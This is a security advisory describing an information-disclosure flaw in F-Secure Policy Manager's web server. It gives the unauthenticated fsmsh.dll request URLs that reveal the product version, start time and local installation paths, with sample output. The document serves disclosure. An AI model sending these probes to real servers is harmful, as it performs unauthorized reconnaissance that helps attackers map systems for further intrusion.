F-Secure's Policy Manager comes bundled with a web server, this web server contains a DLL called fsmsh.dll that can use to discover the local path under which F-Secure is installed under, in addition to the exact version of the product and when it was started.
Vulnerable Systems:
* FSMSH version 5.11.2810
* FSMSH version 5.50.3110
* FSMSH version 5.50.3160
* FSMSH version 5.60.4111
F-Secure's Policy Manager web server runs on port 80/TCP. Connecting to the port via a webbrowser offers the following link, available without authentication: /fsms/fsmsh.dll?FSMSCommand=GetVersion
Following this link will give the Version Number of the application: 5.11.2810
However.... modifiying the link as follows: /fsms/fsmsh.dll?
will give the following result, containing the physical path of the F-Secure installation: FSMSH Version 5.11.2810
Started at: 04/12/07 20:18:48
Processed requests: 8780
Commdir path: C:\Programme\F-Secure\Management Server 5\CommDir
COMMDIR: C:\Programme\F-Secure\Management Server 5\CommDir found
C:\Programme\F-Secure\Management Server 5\CommDir\commdir.cfg found
Repository API initialized - status: OK
